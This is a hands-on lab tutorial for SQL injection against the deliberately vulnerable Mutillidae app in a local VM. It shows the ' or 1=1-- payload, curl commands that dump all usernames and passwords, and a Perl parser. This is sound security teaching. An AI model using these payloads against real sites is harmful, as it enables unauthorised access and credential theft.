ComputerSecurityStudent (CSS) [Login] [Join Now]


|SECURITY TOOLS >> Mutillidae Project >> Mutillidae 2.5.11 >> Current Page |Views: 27214

(Mutillidae: Lesson 7)

{ SQL Injection, Burpsuite, cURL, Perl Parser }

Section 0. Background Information
  • What is Mutillidae?
    • OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast.

  • What is a SQL Injection?
    • SQL injection (also known as SQL fishing) is a technique often used to attack data driven applications.
    • This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in an application's software.
    • The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

  • What is cURL?
    • cURL stands for "Client URL Request Library".
    • This is a command line tool for getting or sending files using URL syntax.
    • It supports a range of common Internet protocols, currently including HTTP, HTTPS, FTP, FTPS, SCP, SFTP, TFTP, LDAP, LDAPS, DICT, TELNET, FILE, IMAP, POP3, SMTP and RTSP.
    • (Damn Beautiful Tool in my opinion)

  • What is Burp Suite?
    • Burp Suite is a Java application that can be used to secure or crack web applications. The suite consists of different tools, such as a proxy server, a web spider, an intruder and a so-called repeater, with which requests can be automated.
    • When Burp suite is used as a proxy server and a web browser uses this proxy server, it is possible to have control of all traffic that is exchanged between the web browser and web servers. Burp makes it possible to manipulate data before it is sent to the web server.

  • Pre-Requisite Lab
    1. Mutillidae: Lesson 1: How to Install Mutillidae in Fedora 14
      • Note: Remote database access has been turned on to provide an additional vulnerability.
    2. BackTrack: Lesson 1: Installing BackTrack 5 R1
      • Note: This is not absolutely necessary, but if you are a computer security student or professional, you should have a BackTrack VM.

  • Lab Notes
    • In this lab we will do the following:
      1. Due to a purposely bug in the user-info.php code, we will use an SQL Injection to obtain a username/password list.
      2. We will use Burpsuite to capture the POST DATA string.
      3. We will use curl to simulate web browsing without using a web browser.
      4. We will use simple perl program to parse the curl results.
  • Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • Your are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2013 No content replication of any kind is allowed without express written permission.

     

Section 1: Configure Fedora14 Virtual Machine Settings
  1. Start VMware Player
    • Instructions
      1. For Windows 7
        1. Click Start Button
        2. Search for "vmware player"
        3. Click VMware Player
      2. For Windows XP
        • Starts --> Programs --> VMware Player

     

  2. Edit Fedora Mutillidae Virtual Machine Settings
    • Instructions:
      1. Highlight Fedora14 - Mutillidae
      2. Click Edit virtual machine settings

     

  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Click the OK Button

 

Section 2: Login to Fedora14 - Mutillidae
  1. Start Fedora14 VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select Fedora14 - Mutillidae
      3. Play virtual machine

     

  2. Login to Fedora14 - Mutillidae
    • Instructions:
      1. Login: student
      2. Password: <whatever you set it to>.

 

Section 3: Open Console Terminal and Retrieve IP Address
  1. Start a Terminal Console
    • Instructions:
      1. Applications --> Terminal

     

  2. Switch user to root
    • Instructions:
      1. su - root
      2. <Whatever you set the root password to>

     

  3. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes (FYI):
      • As indicated below, my IP address is 192.168.1.111.
      • Please record your IP address.

 

Section 4: Configure BackTrack Virtual Machine Settings
  1. Start VMware Player
    • Instructions
      1. For Windows 7
        1. Click Start Button
        2. Search for "vmware player"
        3. Click VMware Player
      2. For Windows XP
        • Starts --> Programs --> VMware Player

     

  2. Edit the BackTrack5R1 VM
    • Instructions:
      1. Select BackTrack5R1 VM
      2. Click Edit virtual machine settings

     

  3. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button

 

Section 5: Play and Login to BackTrack
  1. Play the BackTrack5R1 VM
    • Instructions:
      1. Click on the BackTrack5R1 VM
      2. Click on Play virtual machine

     

  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.

     

  3. Bring up the GNOME
    • Instructions:
      1. Type startx

 

Section 6: Open Console Terminal and Retrieve IP Address
  1. On BackTrack, Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window

     

  2. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • My IP address 192.168.1.109.
      • In your case, it will probably be different.
      • This is the machine that will be use to attack the victim machine (Metasploitable).

 

Section 7: Start Web Browser Session to Mutillidae
  1. On BackTrack, Open Firefox
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser

     

  2. Open Mutillidae
    • Notes (FYI):
      • Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. http://192.168.1.111/mutillidae

 

Section 8: Go To User Info Page
  1. Go to User Info
    • Instructions:
      1. OWASP Top 10 --> A1 - SQL Injection --> SQLi - Extract Data --> User Info

 

Section 9: Configure Firefox Proxy Settings
  1. View Preferences
    • Instructions:
      1. Edit --> Preferences

     

  2. Advanced Settings...
    • Instructions:
      1. Click on the Advanced Icon
      2. Click on the Network Tab
      3. Click on the Setting... button
     
  3. Connection Settings
    • Instructions:
      1. Click on Manual proxy configurations
      2. Type "127.0.0.1" in the HTTP Proxy Text Box
      3. Type "8080" in the Port Text Box
      4. Check Use the proxy server for all protocols
      5. Click OK
      6. Click Close

 

Section 10: Configure Burpsuite Settings
  1. Start Burp Suite
    • Instructions:
      1. Applications --> BackTrack --> Vulnerability Assessment --> Web Application Proxies ---> Web Vulnerability Scanner --> burpsuite

     

  2. JRE Message
    • Instructions:
      1. Click OK

     

  3. Configure proxy
    • Instructions:
      1. Click on the proxy tab
      2. Click on the options tab
      3. Verify the port is set to 8080

     

  4. Turn Off intercept
    • Instructions:
      1. Click on the proxy tab
      2. Click on the intercept tab
      3. Verify the intercept button shows "intercept is off"

 

Section 11: SQL Injection: Obtain Userlist (Method #1)
  1. Obtain Userlist Without Password
    • Instructions:
      1. Place the following in the Name Textbox --> ' or 1=1--
        • Make sure you put a space after the "-- "
      2. Click the View Account Details Button
    • Note(FYI):
      • The string ' or 1=1--  placed in the below query means the following:
        • Search for username that is either equal to nothing OR where 1 is equal to 1.  So, we created a condition that is always true (OR 1=1).  The "-- " string is a comment in SQL.  We used this trick to comment out the rest of the SQL query (AND password=''), which eliminates that password authentication.
      • SELECT * FROM accounts WHERE username='' or 1=1-- ' AND password=''

     

  2. View Results
    • Note(FYI):
      1. Notice the SQL injection returns all the usernames and their passwords.
      2. Notice the weird URL string '+or+1%3D1--+
        • + is a space
        • %3D is an equal sign (=)
        • Thus--> ' or 1=1--
      3. http://192.168.1.111/mutillidae/index.php?page=user-info.php&username='+or+1%3D1--+&password=&user-info-php-submit-button=View+Account+Details
        • What do you want to bet, we can later use the above URL string to obtain the same username and password information without using a web browser?

     

  3. View Post Data (With Burp Suite)
    • Instructions:
      1. Click on the Proxy Tab
      2. Click on the History Tab
      3. Click on the line that contains --> /mutillidae/index.php?page=user-info.php
      4. Click on the Request Tab
      5. Click on the Raw Tab
      6. View the GET Data String
        • Later we will populate curl with this URL string.
    • Note(FYI):
      • /mutillidae/index.php?page=user-info.php&username=%27+or+1%3D1--+&password=&user-info-php-submit-button=View+Account+Details
      • The encoded sql injection --> %27+or+1%3D1--+
        1. %27 is a single quote (')
        2. + is a space
        3. %3D is a equal sign (=)
      • The different between this step and the previous step is that Burpsuite encoded the single quote (') as %27.

     

Section 12: Simulate CURL SQL Injection: (Method #2)
  1. Use Curl to Display Usernames and Passwords
    • Note(FYI):
      • I apologize ahead of time for the below mess.  Match up the colors with the explanations.
      • Replace 192.168.1.111 with Mutillidae's IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. curl -b crack_cookies.txt -c crack_cookies.txt --user-agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" --data "page=user-info.php&username=%27+or+1%3D1--+&password=&user-info-php-submit-button=View+Account+Details" --location "http://192.168.1.111/mutillidae/index.php" | grep -i "Username=" | awk 'BEGIN{FS="<"}{for (i=1; i<=NF; i++) print $i}' | awk -F\> '{print $2}'
    • Note(FYI):
      1. --data "page=user-info.php&username=%27+or+1%3D1--+&password=&user-info-php-submit-button=View+Account+Details"
        • This is the URL POST DATA string we obtained from (Section 11, Step 3) or (Section 11, Step 2).
      2. --location "http://192.168.1.111/mutillidae/index.php"
        • This is the actual webpage script that handles the common gateway interface (CGI) between the web browser and server.
      3. awk 'BEGIN{FS="<"}{for (i=1; i<=NF; i++) print $i}'
        • Use the "<" character as a delimiter or field separator and print each array element on a separate line
      4. grep -i "Username="
        • Display lines that only have the string "Username=".  Remember that the web output from (Section 11, Step 2) contained "Username="
      5. awk -F\> '{print $2}'
        • Use ">" as a delimiter and only print the output from the second field.

 

Section 13: Perl Parser
  1. Create Output File
    • Note(FYI):
      • Replace 192.168.1.111 with Mutillidae's IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. cd /root
      2. curl -b crack_cookies.txt -c crack_cookies.txt --user-agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" --data "page=user-info.php&username=%27+or+1%3D1--+&password=&user-info-php-submit-button=View+Account+Details" --location "http://192.168.1.111/mutillidae/index.php" | grep "Username=" > lesson7.txt
      3. cat lesson7.txt

     

  2. Download Output Parser
    • Instructions:
      1. cd /root
      2. wget http://www.computersecuritystudent.com/SECURITY_TOOLS/MUTILLIDAE/MUTILLIDAE_2511/lesson7/lesson7.pl.TXT
      3. mv lesson7.pl.TXT lesson7.pl
      4. chmod 700 lesson7.pl

     

  3. Run Perl Script
    • Instructions:
      1. ./lesson7.pl
    • Note(FYI):
      • So lets put the pieces together. Imagine a web crawler that does nothing but curl webpages for the string "form".  If the string "form" is found, then try a simple SQL injection like (' or 1=1-- ).  Pretty scary stuff.

 

Section 14: Restore Firefox Original Proxy Configurations
  1. On BackTrack, Open Firefox
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser

     

  2. Firefox Preferences
    • Instructions:
      1. Edit --> Preferences

     

  3. Advanced Settings...
    • Instructions:
      1. Click on the Advanced Icon
      2. Click on the Network Tab
      3. Click on the Setting... button

     

  4. Connection Settings
    • Instructions:
      1. Click on the No proxy radio button
      2. Click on the OK button
      3. Click on the Close button

 

Section 15: Proof of Lab
  1. Proof of Lab, (On a BackTrack Terminal)
    • Instructions:
      1. cd /root
      2. ls -l lesson7.txt
      3. ./lesson7.pl | grep admin
      4. date
      5. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions
      1. Press both the <Ctrl> and <Alt> keys at the same time.
      2. Do a <PrtScn>
      3. Paste into a word document
      4. Upload to Moodle


Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth